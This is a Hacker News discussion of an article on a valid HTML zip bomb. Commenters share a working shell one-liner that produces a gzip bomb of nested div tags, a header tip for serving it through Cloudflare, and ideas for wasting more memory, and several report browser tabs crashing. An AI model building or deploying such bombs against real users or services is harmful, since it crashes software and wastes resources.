A valid HTML zip bomb

(ache.one)

137 points | by Bogdanp 1 day ago

14 comments

  • bhaney 1 day ago
    Neat approach. I make my anti-crawler HTML zip bombs like this:

        (echo '<html><head></head><body>' && yes "<div>") | dd bs=1M count=10240 iflag=fullblock | gzip > bomb.html.gz
    
    So they're just billions of nested div tags. Compresses just as well as repeated-single-character bombs in my experience.
    • pyman 1 day ago
      This is a great idea.

      LLM crawlers are ignoring robots.txt, breaching site terms of service, and ingesting copyrighted data for training without a licence.

      We need more ideas like this!

      • bhaney 1 day ago
        This is the same idea as in the article, just an alternative flavor of generating the zip bomb.

        And I actually only serve this to exploit scanners, not LLM crawlers.

        I've run a lot of websites for a long time, and I've never seen a legitimate LLM crawler ignore robots.txt. I've seen reports of that, but any time I've had a chance to look into it, it's been one of:

        - The site's robots.txt didn't actually say what the author thought they had made it say

        - The crawler had nothing to with the crawler it was claiming to be, it just hijacked a user agent to deflect blame

        It would be pretty weird, after all, for a company running a crawler to ignore robots.txt with hostile intent while also choosing to accurately ID itself to its victim.

    • _ache_ 1 day ago
      Nice command line.
    • chatmasta 1 day ago
      Note: the submission link is not the zip bomb. It’s safe to click.
      • abirch 1 day ago
        Sounds like something a person linking to a zip bomb would say :-D
      • andrew_eu 1 day ago
        I can imagine the large scale web scrapers just avoid processing comments entirely, so while they may unzip the bomb it could be they just discard the chunks that are inside of a comment. The same trick could be applied to other elements in the HTML though: semicolons in the style tag, some gigantic constant in inline JS, etc. If the HTML itself contained a gigantic tree of links to other zip bombs that could also have an amplifying effect on the bad scraper.
        • _ache_ 1 day ago
          There is definitively improvements that can be made. The comment part is more about aesthetic as it is not needed actually, you could have just put the zip chunk in a `div`, I guess.
        • PeterStuer 1 day ago
          For every 1 robots.txt that is genuinly configured, there's 9 that make absolutely no sense at all.

          Worse. GETing the robots.txt automatically flags you as a 'bot'!

          So as a crawler that wants to respect the spirit of the robots.txt, not the inane letter that your hired cheapest junior webadmin copy/pasted there from some reddit comment, we now have to jump through hoops such as geeting hhe robots.txt from a separate vpn etc.

          • Grimblewald 1 day ago
            Well, robots.txt being an opaque and opt out system was broken from the start. I've just started havi g hidden links and pages only mentioned in robots.txt and any ip that tries those is immediatly blocked for 24 hours. There is no reason to continue entertaining these companies.
          • slig 1 day ago
            If you try to do that on a site with Cloudflare, what happens? Do they read the zip file and try to cache the uncompressed content to serve it with the best compression algorithm for a given client, or do they cache the compressed file and serve it "as is"?
            • bhaney 1 day ago
              If you're doing this through cloudflare, you'll want to add the response header

                  cache-control: no-transform
              
              so you don't bomb cloudflare when they naturally try to decompress your document, parse it, and recompress it with whatever methods the client prefers.

              That being said, you can bomb cloudflare without significant issue. It's probably a huge waste of resources for them, but they correctly handle it. I've never seen cloudflare give up before the end-client does.

              • uxjw 1 day ago
                Cloudflare has free AI Labyrinths if your goal is to target AI. The bots follow hidden links to a maze of unrelated content, and Cloudflare uses this to identify bots. https://blog.cloudflare.com/ai-labyrinth/
                • cyanydeez 1 day ago
                  Do you think Meta AI's llama 4 failed so badly cause they ended up crawling a bunch of labrynths?
              • Alifatisk 16 hours ago
                I dislike that the websites sidebar all of sudden collapses during scrolling, it shifts all the content to the left in middle of reading
                • fdomingues 16 hours ago
                  That content shift on page scroll is horrendous. Please don't do that, there is no need to auto hide a side bar.
                  • Telemakhos 1 day ago
                    Safari 18.5 (macOS) throws an error WebKitErrorDomain: 300.
                    • can16358p 1 day ago
                      Crashing Safari on iOS (not technically crashing the whole app, but the tab displays internal WebKit error).
                      • cooprh 1 day ago
                        Crashed 1password on safari haha
                        • xd1936 1 day ago
                          Risky click
                          • ranger_danger 1 day ago
                            Did not crash Firefox nor Chrome for me on Linux.
                            • AndrewThrowaway 13 hours ago
                              Crashed Chrome tab on Windows instantly but Firefox is fine. It shows loading but pressing Ctrl + U even shows the very start of that fake HTML.
                              • _ache_ 1 day ago
                                Perhaps you have very generous limits on RAM allocation per thread. I have 32GB, 128 with swap and still crash (silently on Firefox and with a dedicated screen on Chrome).
                                • Out of curiosity, how do you set these limits? I'm not the person you're replying to, but I'm just using the default limits that ship with Ubuntu 22.04
                                  • _ache_ 1 day ago
                                    Usually in /etc/limits.conf. The field `as` for address space will be my guess, but I not sure, maybe `data`. The man page `man limits.conf` isn't very descriptive.
                                    • inetknght 1 day ago
                                      > The man page `man limits.conf` isn't very descriptive.

                                      Looks to me like it's quite descriptive. What information do you think is missing?

                                      https://www.man7.org/linux/man-pages/man5/limits.conf.5.html

                                      • _ache_ 22 hours ago
                                        What is `data` ? "maximum data size (KB)". Is `address space limit (KB)` virtual or physical ?

                                        What is maximum filesize in a context of a process ?! I mean what happens if a file is bigger ? Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.

                                        I have a bunch of questions.

                                • palmfacehn 1 day ago
                                  Try creating one with deeply nested tags. Recursively adding more nodes via scripting is another memory waster. From there you might consider additional changes to the CSS that cause the document to repaint.
                                  • meinersbur 1 day ago
                                    It will also compress worse, making it less like a zip bomb and more like a huge document. Nothing against that, but the article's trick is just to stop a parser to bail early.
                                    • palmfacehn 1 day ago
                                      For my usage, the compressed size difference with deeply nested divs was negligible.
                                  • esperent 1 day ago
                                    It crashed the tab in Brave on Android for me.
                                    • johnisgood 1 day ago
                                      It crashed the tab on Vivaldi (Linux).
                                    • Tepix 1 day ago
                                      Imagine you‘re a crawler operator. Do you really have a problem with documents like this? I don’t think so.
                                      • Related:

                                        Fun with gzip bombs and email clients

                                        https://news.ycombinator.com/item?id=44651536